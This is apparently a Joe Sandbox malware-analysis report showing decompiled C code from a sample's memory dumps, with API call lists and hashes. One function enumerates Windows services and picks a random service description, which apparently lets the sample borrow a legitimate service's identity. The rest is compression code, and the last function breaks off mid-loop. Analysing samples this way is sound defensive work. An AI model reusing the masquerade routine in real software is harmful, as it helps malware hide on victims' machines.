                  				signed char _t310;
                  				int _t336;
                  				int _t337;
                  				signed char _t341;
                  				signed char _t342;
                  				signed char _t343;
                  				void* _t344;
                  				void* _t345;
                  				signed char _t346;
                  				signed char _t347;
                  				signed char _t348;
                  				signed char* _t349;
                  				signed char* _t350;
                  				signed char _t351;
                  				signed char* _t352;
                  				signed char* _t353;
                  				signed char* _t354;
                  				signed char* _t355;
                  				signed char* _t356;
                  				intOrPtr _t358;
                  				intOrPtr _t360;
                  				char _t361;
                  				intOrPtr _t362;
                  				char _t364;
                  				intOrPtr _t366;
                  				intOrPtr _t368;
                  				void* _t374;
                  				void* _t375;
                  				signed int _t377;
                  				signed char _t379;
                  				int _t381;
                  				void* _t383;
                  				signed int _t385;
                  				void* _t387;
                  				void* _t388;
                  				signed int _t389;
                  				void* _t390;
                  				void* _t391;
                  				void* _t392;
                  				void* _t393;
                  
                  				_v20 = 0xff;
                  				_t383 = __ecx;
                  				 *((short*)(__ecx + 0x8392)) = 1;
                  				E00402D85(__ecx, 0, 0x120, 0xf, 0);
                  				E00402D85(__ecx, 1, 0x20, 0xf, 0);
                  				_t392 = _t391 + 0x18;
                  				_t336 = 0x11e;
                  				while( *((char*)(_t383 + _t336 + 0x8f11)) == 0) {
                  					_t336 = _t336 - 1;
                  					if(_t336 > 0x101) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_v16 = _t336;
                  				_t269 = 0x1e;
                  				while( *((char*)(_t383 + _t269 + 0x9031)) == 0) {
                  					_t269 = _t269 - 1;
                  					if(_t269 > 1) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_v32 = _t269;
                  				memcpy( &_v676, _t383 + 0x8f12, _t336);
                  				memcpy( &_v676 + _t336, _t383 + 0x9032, _v32);
                  				_t337 = 0;
                  				_v36 = _v32 + _t336;
                  				_v12 = 0;
                  				_v8 = 0;
                  				memset(_t383 + 0x8612, 0, 0x26);
                  				_t393 = _t392 + 0x24;
                  				_v28 = 0;
                  				if(_v36 > 0) {
                  					_t310 = _v20;
                  					do {
                  						_t379 =  *((intOrPtr*)(_t390 + _v28 - 0x2a0));
                  						_v24 = _t379;
                  						if(_t379 != 0) {
                  							_t358 = _v12;
                  							if(_t358 != 0) {
                  								if(_t358 >= 3) {
                  									if(_t358 > 0xa) {
                  										 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
                  										_t364 = _t358 - 0xb;
                  										 *(_t390 + _t337 - 0x160) = 0x12;
                  									} else {
                  										 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
                  										_t364 = _t358 - 3;
                  										 *(_t390 + _t337 - 0x160) = 0x11;
                  									}
                  									 *((char*)(_t390 + _t337 - 0x15f)) = _t364;
                  									_t337 = _t337 + 2;
                  								} else {
                  									 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t358;
                  									E0040FDD0( &_v356 + _t337, 0, _t358);
                  									_t393 = _t393 + 0xc;
                  									_t379 = _v24;
                  									_t337 = _t337 + _v12;
                  								}
                  								_t310 = _v20;
                  								_v12 = 0;
                  							}
                  							if(_t379 == _t310) {
                  								_t381 = _v8 + 1;
                  								_v8 = _t381;
                  								if(_t381 == 6) {
                  									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  									_t381 = 0;
                  									 *(_t390 + _t337 - 0x160) = 0x310;
                  									_v8 = 0;
                  									goto L33;
                  								}
                  							} else {
                  								_t362 = _v8;
                  								if(_t362 != 0) {
                  									if(_t362 >= 3) {
                  										 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  										 *(_t390 + _t337 - 0x160) = 0x10;
                  										 *((char*)(_t390 + _t337 - 0x15f)) = _t362 - 3;
                  										_t337 = _t337 + 2;
                  									} else {
                  										 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t362;
                  										E0040FDD0( &_v356 + _t337, _v20, _t362);
                  										_t379 = _v24;
                  										_t393 = _t393 + 0xc;
                  										_t337 = _t337 + _v8;
                  									}
                  									_v8 = 0;
                  								}
                  								 *(_t390 + _t337 - 0x160) = _t379;
                  								_t381 = _v8;
                  								 *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) =  *((short*)(_t383 + 0x8612 + (_t379 & 0x000000ff) * 2)) + 1;
                  								_t337 = _t337 + 1;
                  							}
                  						} else {
                  							_t366 = _v8;
                  							if(_t366 != 0) {
                  								if(_t366 >= 3) {
                  									 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  									 *(_t390 + _t337 - 0x160) = 0x10;
                  									 *((char*)(_t390 + _t337 - 0x15f)) = _t366 - 3;
                  									_t337 = _t337 + 2;
                  								} else {
                  									 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t366;
                  									E0040FDD0( &_v356 + _t337, _v20, _t366);
                  									_t393 = _t393 + 0xc;
                  									_t337 = _t337 + _v8;
                  								}
                  								_v8 = 0;
                  							}
                  							_t381 = _v8;
                  							_t368 = _v12 + 1;
                  							_v12 = _t368;
                  							if(_t368 == 0x8a) {
                  								 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
                  								 *(_t390 + _t337 - 0x160) = 0x7f12;
                  								_v12 = 0;
                  								L33:
                  								_t337 = _t337 + 2;
                  							}
                  						}
                  						_v28 = _v28 + 1;
                  						_t310 = _v24;
                  						_t360 = _v12;
                  						_v20 = _t310;
                  					} while (_v28 < _v36);
                  					if(_t381 == 0) {
                  						if(_t360 != 0) {
                  							if(_t360 >= 3) {
                  								if(_t360 > 0xa) {
                  									 *((short*)(_t383 + 0x8636)) =  *((short*)(_t383 + 0x8636)) + 1;
                  									_t361 = _t360 - 0xb;
                  									 *(_t390 + _t337 - 0x160) = 0x12;
                  								} else {
                  									 *((short*)(_t383 + 0x8634)) =  *((short*)(_t383 + 0x8634)) + 1;
                  									_t361 = _t360 - 3;
                  									 *(_t390 + _t337 - 0x160) = 0x11;
                  								}
                  								 *((char*)(_t390 + _t337 - 0x15f)) = _t361;
                  								goto L46;
                  							} else {
                  								 *(_t383 + 0x8612) =  *(_t383 + 0x8612) + _t360;
                  								E0040FDD0( &_v356 + _t337, 0, _t360);
                  								_t393 = _t393 + 0xc;
                  								_t337 = _t337 + _v12;
                  							}
                  						}
                  					} else {
                  						if(_t381 >= 3) {
                  							 *((short*)(_t383 + 0x8632)) =  *((short*)(_t383 + 0x8632)) + 1;
                  							 *(_t390 + _t337 - 0x160) = 0x10;
                  							 *((char*)(_t390 + _t337 - 0x15f)) = _t381 - 3;
                  							L46:
                  							_t337 = _t337 + 2;
                  						} else {
                  							 *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) =  *((intOrPtr*)(_t383 + 0x8612 + (_t310 & 0x000000ff) * 2)) + _t381;
                  							E0040FDD0( &_v356 + _t337, _v24, _t381);
                  							_t393 = _t393 + 0xc;
                  							_t337 = _t337 + _v8;
                  						}
                  					}
                  				}
                  				_push(0);
                  				_push(7);
                  				_push(0x13);
                  				_t385 = 2;
                  				E00402D85(_t383, _t385);
                  				_t341 =  *(_t383 + 0x44);
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t385 << _t341;
                  				_t387 = 0xfffffff8;
                  				_t283 = _t341 + 2;
                  				_t374 = 8;
                  				 *(_t383 + 0x44) = _t283;
                  				if(_t283 >= _t374) {
                  					do {
                  						_t356 =  *(_t383 + 0x30);
                  						if(_t356 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							 *_t356 =  *(_t383 + 0x48);
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t342 =  *(_t383 + 0x44);
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v16 + 0xfffffeff << _t342;
                  				_t287 = _t342 + 5;
                  				 *(_t383 + 0x44) = _t287;
                  				if(_t287 >= _t374) {
                  					do {
                  						_t355 =  *(_t383 + 0x30);
                  						if(_t355 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							 *_t355 =  *(_t383 + 0x48);
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t343 =  *(_t383 + 0x44);
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _v32 - 0x00000001 << _t343;
                  				_t291 = _t343 + 5;
                  				 *(_t383 + 0x44) = _t291;
                  				if(_t291 >= _t374) {
                  					do {
                  						_t354 =  *(_t383 + 0x30);
                  						if(_t354 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							 *_t354 =  *(_t383 + 0x48);
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t344 = 0x12;
                  				while(1) {
                  					_t186 = _t344 + 0x4111a0; // 0xf
                  					if( *((char*)(( *_t186 & 0x000000ff) + _t383 + 0x9152)) != 0) {
                  						break;
                  					}
                  					_t344 = _t344 - 1;
                  					if(_t344 >= 0) {
                  						continue;
                  					}
                  					break;
                  				}
                  				_t189 = _t344 + 1; // 0x12
                  				_t345 = 4;
                  				_t294 =  <  ? _t345 : _t189;
                  				_t346 =  *(_t383 + 0x44);
                  				_v16 = _t294;
                  				 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t294 + 0xfffffffc << _t346;
                  				_t297 = _t346 + 4;
                  				 *(_t383 + 0x44) = _t297;
                  				if(_t297 >= _t374) {
                  					do {
                  						_t353 =  *(_t383 + 0x30);
                  						if(_t353 <  *((intOrPtr*)(_t383 + 0x34))) {
                  							_t297 =  *(_t383 + 0x48);
                  							 *_t353 = _t297;
                  							 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  						}
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  						 *(_t383 + 0x44) =  *(_t383 + 0x44) + _t387;
                  					} while ( *(_t383 + 0x44) >= _t374);
                  				}
                  				_t388 = 0;
                  				_t375 = 0;
                  				if(_v16 > 0) {
                  					_t389 = _v16;
                  					do {
                  						_t208 = _t375 + 0x4111a0; // 0x121110
                  						_t351 =  *(_t383 + 0x44);
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(( *_t208 & 0x000000ff) + _t383 + 0x9152) & 0x000000ff) << _t351;
                  						_t297 = _t351 + 3;
                  						 *(_t383 + 0x44) = _t297;
                  						if(_t297 >= 8) {
                  							do {
                  								_t352 =  *(_t383 + 0x30);
                  								if(_t352 <  *((intOrPtr*)(_t383 + 0x34))) {
                  									_t297 =  *(_t383 + 0x48);
                  									 *_t352 = _t297;
                  									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  								}
                  								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
                  							} while ( *(_t383 + 0x44) >= 8);
                  						}
                  						_t375 = _t375 + 1;
                  					} while (_t375 < _t389);
                  					_t388 = 0;
                  				}
                  				if(_t337 != 0) {
                  					do {
                  						_t298 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
                  						_t388 = _t388 + 1;
                  						_t347 =  *(_t383 + 0x44);
                  						_v16 = _t298;
                  						 *(_t383 + 0x48) =  *(_t383 + 0x48) | ( *(_t383 + 0x8cd2 + _t298 * 2) & 0x0000ffff) << _t347;
                  						_t301 = _t347 + ( *(_t383 + _t298 + 0x9152) & 0x000000ff);
                  						 *(_t383 + 0x44) = _t301;
                  						if(_t301 >= 8) {
                  							do {
                  								_t350 =  *(_t383 + 0x30);
                  								if(_t350 <  *((intOrPtr*)(_t383 + 0x34))) {
                  									 *_t350 =  *(_t383 + 0x48);
                  									 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  								}
                  								 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  								 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
                  							} while ( *(_t383 + 0x44) >= 8);
                  						}
                  						_t297 = _v16;
                  						if(_t297 >= 0x10) {
                  							_t377 =  *(_t390 + _t388 - 0x160) & 0x000000ff;
                  							_t388 = _t388 + 1;
                  							_t348 =  *(_t383 + 0x44);
                  							_t297 = ( &__imp__IsProcessorFeaturePresent)[_t297] + _t348;
                  							 *(_t383 + 0x48) =  *(_t383 + 0x48) | _t377 << _t348;
                  							 *(_t383 + 0x44) = _t297;
                  							if(_t297 >= 8) {
                  								do {
                  									_t349 =  *(_t383 + 0x30);
                  									if(_t349 <  *((intOrPtr*)(_t383 + 0x34))) {
                  										_t297 =  *(_t383 + 0x48);
                  										 *_t349 = _t297;
                  										 *(_t383 + 0x30) =  &(( *(_t383 + 0x30))[1]);
                  									}
                  									 *(_t383 + 0x48) =  *(_t383 + 0x48) >> 8;
                  									 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
                  								} while ( *(_t383 + 0x44) >= 8);
                  							}
                  						}
                  					} while (_t388 < _t337);
                  				}
                  				return _t297;
                  			}

                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memset$memcpy
                  • String ID: 0HCw
                  • API String ID: 1551266493-3134391196
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: ca43e400cc7215004ac780a32a62955417f8f7f80a22650c2bf1bec3b8deea9e
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: 46024830900666EFCB16CF68C9C56EABF74FF45301F14017AC855A7782C73AAA25CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 15%
                  			E0040F504(void* __ecx, intOrPtr* __edx) {
                  				char _v8;
                  				char _v12;
                  				signed int _v16;
                  				void* _v20;
                  				void* _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr* _v36;
                  				intOrPtr _t39;
                  				void* _t40;
                  				void* _t48;
                  				intOrPtr _t59;
                  				intOrPtr _t61;
                  				void* _t62;
                  				void* _t64;
                  				short** _t65;
                  
                  				_t62 = __ecx;
                  				_v36 = __edx;
                  				_v24 = __ecx;
                  				_push(0);
                  				_push(0);
                  				_t48 = 0;
                  				_push( &_v16);
                  				_push( &_v8);
                  				_push(0);
                  				_push(0);
                  				_push(3);
                  				_push(0x30);
                  				_push(0);
                  				_push(__ecx);
                  				if( *0x412fe8() != 0 || GetLastError() != 0xea) {
                  					L19:
                  					return _t48;
                  				} else {
                  					_t59 = E004014F2(_v8);
                  					_v32 = _t59;
                  					if(_t59 == 0) {
                  						L18:
                  						goto L19;
                  					}
                  					_push(0);
                  					_push(0);
                  					_push( &_v16);
                  					_push( &_v8);
                  					_push(_v8);
                  					_push(_t59);
                  					_push(3);
                  					_push(0x30);
                  					_push(0);
                  					_push(_t62);
                  					if( *0x412fe8() == 0) {
                  						_t61 = _v28;
                  						goto L16;
                  					} else {
                  						_t64 = (GetTickCount() & 0x0000000f) * 0x2c + _t59;
                  						_t39 = _v16 * 0x2c + _t64;
                  						_v28 = _t39;
                  						_t65 =  >=  ? _t59 : _t64;
                  						_t61 = _v28;
                  						while(_t65 < _t39) {
                  							_t40 = OpenServiceW(_v24,  *_t65, 1);
                  							_v20 = _t40;
                  							if(_t40 == 0) {
                  								L13:
                  								_t39 = _v28;
                  								_t65 =  &(_t65[0xb]);
                  								if(_t48 == 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							_push( &_v12);
                  							_push(0);
                  							_push(0);
                  							_push(1);
                  							_push(_t40);
                  							if( *0x4135b4() == 0 && GetLastError() == 0x7a) {
                  								_t61 = E004014F2(_v12);
                  								if(_t61 != 0) {
                  									_t48 =  *0x4135b4(_v20, 1, _t61, _v12,  &_v12);
                  									if(_t48 == 0) {
                  										E00401532(_t61);
                  									}
                  								}
                  							}
                  							CloseServiceHandle(_v20);
                  							goto L13;
                  						}
                  						L16:
                  						E00401532(_v32);
                  						if(_t48 != 0) {
                  							 *_v36 = _t61;
                  						}
                  						goto L18;
                  					}
                  				}
                  			}

                  APIs
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,0040F83E,?,00000000,00000000), ref: 0040F52A
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F538
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,0040F83E,0040F83E,?,00000000,00000000), ref: 0040F575
                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F583
                  • OpenServiceW.ADVAPI32(?,00000000,00000001,?,?,?,?,?,?,?,0040F83E), ref: 0040F5AD
                  • QueryServiceConfig2W.ADVAPI32(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,0040F83E), ref: 0040F5C5
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F5CF
                  • QueryServiceConfig2W.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,0040F83E), ref: 0040F5F5
                    • Part of subcall function 00401532: GetProcessHeap.KERNEL32(00000000,?,0040F628,?,?,?,?,?,?,?,0040F83E), ref: 00401535
                    • Part of subcall function 00401532: HeapFree.KERNEL32(00000000), ref: 0040153C
                  • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,0040F83E), ref: 0040F60B
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: HeapService$Config2EnumErrorLastProcessQueryServicesStatus$AllocateCloseCountFreeHandleOpenTick
                  • String ID:
                  • API String ID: 2166652104-0
                  • Opcode ID: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction ID: fb962817b9f77482ee3899ed83bed23c765ea0bda143a25e94a62ef856afa488
                  • Opcode Fuzzy Hash: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction Fuzzy Hash: 4E418071A00105BFDB259FA5DC86EEFBBB9EF44700F10013AF901F62A0DA759E068B58
                  Uniqueness

                  Uniqueness Score: 0.19%

                  C-Code - Quality: 79%
                  			E004037A9(intOrPtr* __ecx, intOrPtr __edx) {
                  				unsigned int _v8;
                  				intOrPtr _v12;
                  				int _v16;
                  				intOrPtr _v20;
                  				intOrPtr _t271;
                  				signed char _t279;
                  				intOrPtr _t283;
                  				intOrPtr _t291;
                  				signed int _t299;
                  				signed int _t300;
                  				signed char _t303;
                  				signed char _t306;
                  				signed char _t315;
                  				signed char _t324;
                  				signed char _t327;
                  				signed char _t333;
                  				signed int _t342;
                  				signed char _t344;
                  				signed char _t348;
                  				intOrPtr _t357;
                  				signed int _t358;
                  				void* _t359;
                  				void* _t362;
                  				intOrPtr _t363;
                  				signed char _t366;
                  				intOrPtr _t367;
                  				signed char _t370;
                  				signed char _t371;
                  				signed char _t372;
                  				char* _t373;
                  				char* _t374;
                  				char* _t375;
                  				signed char _t376;
                  				char* _t377;
                  				char* _t378;
                  				signed char _t382;
                  				signed char _t383;
                  				signed char _t384;
                  				char* _t385;
                  				char* _t386;
                  				char* _t387;
                  				char* _t388;
                  				char* _t393;
                  				signed char _t394;
                  				signed char _t395;
                  				char* _t396;
                  				char* _t397;
                  				intOrPtr _t398;
                  				int _t400;
                  				intOrPtr _t401;
                  				void* _t402;
                  				signed int _t403;
                  				signed int _t404;
                  				void* _t406;
                  				void* _t410;
                  				intOrPtr _t411;
                  				int _t414;
                  				void* _t415;
                  				signed char _t416;
                  				intOrPtr* _t417;
                  
                  				_t417 = __ecx;
                  				_t357 = __edx;
                  				_v20 = __edx;
                  				_v16 = 0;
                  				if(( *(__ecx + 8) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
                  					_t400 = 0;
                  				} else {
                  					_t400 = 1;
                  				}
                  				if( *_t417 != 0) {
                  					L7:
                  					_t271 = _t417 + 0x39272;
                  					goto L8;
                  				} else {
                  					_t398 =  *((intOrPtr*)(_t417 + 0x8c));
                  					if( *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t398 < 0x14ccc) {
                  						goto L7;
                  					} else {
                  						_t271 =  *((intOrPtr*)(_t417 + 0x74)) + _t398;
                  						L8:
                  						 *((intOrPtr*)(_t417 + 0x30)) = _t271;
                  						_v12 = _t271;
                  						 *((intOrPtr*)(_t417 + 0x34)) = _t271 + 0x14cbc;
                  						 *(_t417 + 0x58) = 0;
                  						 *((intOrPtr*)(_t417 + 0x5c)) = 0;
                  						 *( *(_t417 + 0x2c)) =  *( *(_t417 + 0x2c)) >>  *(_t417 + 0x38);
                  						_t410 = 8;
                  						 *((intOrPtr*)(_t417 + 0x28)) =  *((intOrPtr*)(_t417 + 0x28)) - (0 |  *(_t417 + 0x38) == _t410);
                  						if(( *(_t417 + 8) & 0x00001000) == 0 ||  *((intOrPtr*)(_t417 + 0x64)) != 0) {
                  							L18:
                  							_t366 =  *(_t417 + 0x44);
                  							 *(_t417 + 0x48) =  *(_t417 + 0x48) | (0 | _t357 == 0x00000004) << _t366;
                  							_t64 = _t366 + 1; // 0xf9
                  							_t279 = _t64;
                  							 *(_t417 + 0x44) = _t279;
                  							if(_t279 < _t410) {
                  								L22:
                  								_t411 =  *((intOrPtr*)(_t417 + 0x30));
                  								_t358 =  *(_t417 + 0x44);
                  								_v8 =  *(_t417 + 0x48);
                  								if(_t400 != 0) {
                  									_t401 = _v16;
                  									L47:
                  									if( *((intOrPtr*)(_t417 + 0x1c)) -  *((intOrPtr*)(_t417 + 0x40)) >  *((intOrPtr*)(_t417 + 0x24))) {
                  										L28:
                  										if(_t401 == 0) {
                  											_t87 =  &_v8; // 0x40473a
                  											 *(_t417 + 0x48) =  *_t87;
                  											 *((intOrPtr*)(_t417 + 0x30)) = _t411;
                  											 *(_t417 + 0x44) = _t358;
                  											E0040378E(_t417, _t401 + 1);
                  										}
                  										_t359 = 2;
                  										L31:
                  										_t283 = _v20;
                  										if(_t283 == 0) {
                  											L84:
                  											memset(_t417 + 0x8192, 0, 0x240);
                  											memset(_t417 + 0x83d2, 0, 0x40);
                  											 *(_t417 + 0x38) = 8;
                  											 *((intOrPtr*)(_t417 + 0x28)) = _t417 + 0x9273;
                  											 *(_t417 + 0x2c) = _t417 + 0x9272;
                  											 *((intOrPtr*)(_t417 + 0x40)) =  *((intOrPtr*)(_t417 + 0x40)) +  *(_t417 + 0x3c);
                  											 *((intOrPtr*)(_t417 + 0x64)) =  *((intOrPtr*)(_t417 + 0x64)) + 1;
                  											_t291 = _v12;
                  											 *(_t417 + 0x3c) = 0;
                  											_t362 =  *((intOrPtr*)(_t417 + 0x30)) - _t291;
                  											if(_t362 == 0) {
                  												L92:
                  												return  *((intOrPtr*)(_t417 + 0x5c));
                  											}
                  											if( *_t417 == 0) {
                  												_t402 = _t417 + 0x39272;
                  												if(_t291 != _t402) {
                  													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t362;
                  												} else {
                  													_t367 =  *((intOrPtr*)(_t417 + 0x8c));
                  													_t414 =  <  ? _t362 :  *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t367;
                  													memcpy( *((intOrPtr*)(_t417 + 0x74)) + _t367, _t402, _t414);
                  													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t414;
                  													_t363 = _t362 - _t414;
                  													if(_t363 != 0) {
                  														 *(_t417 + 0x58) = _t414;
                  														 *((intOrPtr*)(_t417 + 0x5c)) = _t363;
                  													}
                  												}
                  												goto L92;
                  											}
                  											 *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x78)))) =  *((intOrPtr*)(_t417 + 0x84)) -  *((intOrPtr*)(_t417 + 0x70));
                  											_t299 =  *_t417(_t417 + 0x39272, _t362,  *((intOrPtr*)(_t417 + 4)));
                  											if(_t299 != 0) {
                  												goto L92;
                  											}
                  											_t300 = _t299 | 0xffffffff;
                  											 *(_t417 + 0x6c) = _t300;
                  											return _t300;
                  										}
                  										_t370 =  *(_t417 + 0x44);
                  										_t415 = 4;
                  										if(_t283 != _t415) {
                  											_t403 = 0;
                  											 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
                  											_t303 = _t370 + 3;
                  											 *(_t417 + 0x44) = _t303;
                  											if(_t303 < 8) {
                  												L74:
                  												_t371 =  *(_t417 + 0x44);
                  												if(_t371 == 0) {
                  													do {
                  														L79:
                  														_t372 =  *(_t417 + 0x44);
                  														 *(_t417 + 0x48) =  *(_t417 + 0x48) | (_t403 & 0x0000ffff) << _t372;
                  														_t227 = _t372 + 0x10; // 0x18
                  														_t306 = _t227;
                  														 *(_t417 + 0x44) = _t306;
                  														if(_t306 < 8) {
                  															goto L83;
                  														} else {
                  															goto L80;
                  														}
                  														do {
                  															L80:
                  															_t373 =  *((intOrPtr*)(_t417 + 0x30));
                  															if(_t373 <  *((intOrPtr*)(_t417 + 0x34))) {
                  																 *_t373 =  *(_t417 + 0x48);
                  																 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  															}
                  															 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  															 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  														} while ( *(_t417 + 0x44) >= 8);
                  														L83:
                  														_t403 = _t403 ^ 0x0000ffff;
                  														_t359 = _t359 - 1;
                  													} while (_t359 != 0);
                  													goto L84;
                  												}
                  												 *(_t417 + 0x44) = 8;
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t371;
                  												do {
                  													_t374 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t374 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t374 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= 8);
                  												goto L79;
                  											} else {
                  												goto L71;
                  											}
                  											do {
                  												L71:
                  												_t375 =  *((intOrPtr*)(_t417 + 0x30));
                  												if(_t375 <  *((intOrPtr*)(_t417 + 0x34))) {
                  													 *_t375 =  *(_t417 + 0x48);
                  													 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  												}
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  												 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  											} while ( *(_t417 + 0x44) >= 8);
                  											goto L74;
                  										}
                  										if(_t370 == 0) {
                  											L38:
                  											if(( *(_t417 + 8) & 0x00001000) == 0) {
                  												goto L84;
                  											}
                  											_t404 =  *(_t417 + 0x18);
                  											do {
                  												_t376 =  *(_t417 + 0x44);
                  												 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t404 >> 0x00000018 << _t376;
                  												_t113 = _t376 + 8; // 0x10
                  												_t315 = _t113;
                  												 *(_t417 + 0x44) = _t315;
                  												if(_t315 < 8) {
                  													goto L44;
                  												} else {
                  													goto L41;
                  												}
                  												do {
                  													L41:
                  													_t377 =  *((intOrPtr*)(_t417 + 0x30));
                  													if(_t377 <  *((intOrPtr*)(_t417 + 0x34))) {
                  														 *_t377 =  *(_t417 + 0x48);
                  														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
                  													}
                  													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
                  													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
                  												} while ( *(_t417 + 0x44) >= 8);
                  												L44:
                  												_t404 = _t404 << 8;
                  												_t415 = _t415 - 1;
                  											} while (_t415 != 0);
                  											goto L84;
                  										}
                  										 *(_t417 + 0x44) = 8;
                  										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
                  										do {
